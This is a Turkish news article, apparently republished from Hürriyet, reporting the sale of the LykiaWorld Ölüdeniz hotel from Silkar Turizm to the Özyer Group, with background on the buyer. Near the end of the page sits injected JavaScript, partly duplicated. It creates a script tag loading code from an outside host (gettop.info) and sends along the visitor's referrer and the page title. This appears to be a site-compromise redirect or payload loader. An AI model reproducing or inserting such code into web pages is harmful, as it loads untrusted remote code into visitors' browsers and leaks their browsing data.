Buradasınız: Ana sayfa - Genel - Türkiye’nin en büyük otellerinden LykiaWorld Ölüdeniz satıldı…

Türkiye’nin en büyük otellerinden LykiaWorld Ölüdeniz satıldı…

300x250 reklam kodu buraya Silkar Turizm bünyesinde bulunan LykiaWorld Ölüdeniz’le ilgili bir süredir konuşulan satış dedikoduları gerçek oldu. Silkar Turizm Yönetim Kurulu Başkanı Attila Silahtaroğlu, 23 yıl önce açılan otelin Özyer Grubu’na devredildiğini söyledi.

lykia world oludeniz Türkiyenin en büyük otellerinden LykiaWorld Ölüdeniz satıldı...

GEÇEN YILA DAMGA VURAN SATIŞLAR…

Silahtaroğlu, devir işlemi ile ilgili olarak, “Özyer Grubu’nun bünyesinde kurulu Lykia Turizm A.Ş gerekli hukuki sürecin tamamlanmasına takiben en yakın zamanda tesisin üst hakkını resmi olarak devir alacaktır” açıklamasında bulundu.

Sponsor bağlantılar

468x15 reklam kodu buraya

Taraflar arasındaki anlaşma gereği yılsonuna kadar Silkar Turizm’in tüm fikri mülkiyet haklarına sahip olduğu ‘Lykia World’ markasının Ölüdeniz tesislerinde Lykia Turizm A.Ş tarafından kullanılmasına karar verildi. Otel yaz sezonunda da aynı konsept ile işletilmeye devam edecek.

300x250 reklam kodu buraya

FETHİYE’DEN BÜYÜDÜ…

1948 yılında Fethiye’de açılan tekstil ve kuyum mağazası ile kurulan Özyer Grup, son yıllarda turizm sektöründeki hızlı büyümesi ile dikkat çekiyor. Grubun üç tanesi Liberty markası adı altında olmak üzere turizmde toplam sekiz yatırımı bulunuyor. Özyer Grubu’nun turizm haricinde inşaat, kuyum, medya ve enerji sektöründe de çeşitli yatırımları bulunuyor. Şirketlerin merkezi ise Fethiye’de yer alıyor.

(Hürriyet)

Sponsor bağlantılar

468x15 reklam kodu buraya

var d=document;var s=d.createElement(‘script’);

var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiketler:, , ,

Comments are closed.